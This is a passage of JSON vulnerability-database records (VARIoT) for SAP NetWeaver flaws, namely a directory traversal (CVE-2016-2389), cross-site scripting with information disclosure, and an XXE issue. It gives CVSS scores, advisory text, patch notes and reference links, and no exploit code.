"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2389",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-299",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-2389",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "VULMON",
"id": "CVE-2016-2389"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39837",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2389",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "39837",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "137046",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2016-2389",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"id": "VAR-201602-0121",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-02-13T22:51:42.166000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2230978",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver Manufacturing Integration and Intelligence Fixes for directory traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60235"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.4,
"url": "https://erpscan.com/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"trust": 1.4,
"url": "https://erpscan.com/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 1.2,
"url": "https://www.exploit-db.com/exploits/39837/"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/137046/sap-mii-15.0-directory-traversal.html"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2016/may/40"
},
{
"trust": 1.1,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2389"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2389"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-16T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"date": "2016-03-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"date": "2016-02-16T15:59:03.023000",
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2389"
},
{
"date": "2016-03-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"date": "2018-12-10T19:29:16.280000",
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
}
],
"trust": 0.6
}
}
var-201210-0566
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. A cross-site scripting vulnerability exists in the SAP NetWeaver Mobile Architecture WEB console. Allows an attacker to exploit a vulnerability to gain sensitive information or hijack a user's session. There is an unspecified error in the SAP NetWeaver streaming server servlet. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver Information Disclosure and Cross-Site Scripting Vulnerabilities
SECUNIA ADVISORY ID: SA50882
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50882/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50882
RELEASE DATE: 2012-10-05
DISCUSS ADVISORY: http://secunia.com/advisories/50882/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/50882/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50882
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported two vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to disclose potentially sensitive information and conduct cross-site scripting attacks.
2) Certain unspecified input is not properly sanitised within the Mobile Infrastructure Web Console before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.x. Other versions may also be affected.
SOLUTION: Reportedly a fix has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: Dmitry Chastuchin, ERPScan
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1675605 https://service.sap.com/sap/support/notes/1590866
ERPScan (DSECRG-12-032, DSECRG-12-031): http://erpscan.com/advisories/dsecrg-12-032-sap-netweaver-7-0-information-disclosure/ http://erpscan.com/advisories/dsecrg-12-031-sap-netweaver-mobile-xs/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201210-0566",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "117149"
}
],
"trust": 0.1
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "66122edc-1f52-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. A cross-site scripting vulnerability exists in the SAP NetWeaver Mobile Architecture WEB console. Allows an attacker to exploit a vulnerability to gain sensitive information or hijack a user\u0027s session. There is an unspecified error in the SAP NetWeaver streaming server servlet. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Information Disclosure and Cross-Site Scripting\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA50882\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/50882/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50882\n\nRELEASE DATE:\n2012-10-05\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/50882/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/50882/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50882\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported two vulnerabilities in SAP NetWeaver, which can\nbe exploited by malicious people to disclose potentially sensitive\ninformation and conduct cross-site scripting attacks. \n\n2) Certain unspecified input is not properly sanitised within the\nMobile Infrastructure Web Console before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in a\nuser\u0027s browser session in context of an affected site. \n\nThe vulnerabilities are reported in version 7.x. Other versions may\nalso be affected. \n\nSOLUTION:\nReportedly a fix has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitry Chastuchin, ERPScan\n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1675605\nhttps://service.sap.com/sap/support/notes/1590866\n\nERPScan (DSECRG-12-032, DSECRG-12-031):\nhttp://erpscan.com/advisories/dsecrg-12-032-sap-netweaver-7-0-information-disclosure/\nhttp://erpscan.com/advisories/dsecrg-12-031-sap-netweaver-mobile-xs/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
},
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "117149"
}
],
"trust": 1.53
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "50882",
"trust": 1.3
},
{
"db": "CNVD",
"id": "CNVD-2012-5637",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-5638",
"trust": 0.8
},
{
"db": "IVD",
"id": "67B19A52-1F52-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "66122EDC-1F52-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "117149",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
},
{
"db": "PACKETSTORM",
"id": "117149"
}
]
},
"id": "VAR-201210-0566",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
}
],
"trust": 1.8691792200000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
}
]
},
"last_update_date": "2022-05-17T02:05:58.319000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-5637)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/23556"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-5638)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/23557"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://secunia.com/advisories/50882/http"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-031-sap-netweaver-mobile-xs/"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/dsecrg-12-032-sap-netweaver-7-0-information-disclosure/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1675605"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50882/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50882"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1590866"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50882/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
},
{
"db": "PACKETSTORM",
"id": "117149"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"db": "CNVD",
"id": "CNVD-2012-5638"
},
{
"db": "PACKETSTORM",
"id": "117149"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-11T00:00:00",
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
},
{
"date": "2012-10-11T00:00:00",
"db": "IVD",
"id": "66122edc-1f52-11e6-abef-000c29c66e3d"
},
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5638"
},
{
"date": "2012-10-05T04:47:01",
"db": "PACKETSTORM",
"id": "117149"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5637"
},
{
"date": "2012-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-5638"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-5637)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-5637"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "67b19a52-1f52-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201707-0530
Vulnerability from variot
XML external entity (XXE) vulnerability in com.sap.km.cm.ice in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request, aka SAP Security Note 2387249. SAP NetWeaver AS JAVA Is XML An external entity vulnerability exists. Vendors have confirmed this vulnerability SAP Security Note 2387249 It is released as.Information may be obtained. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
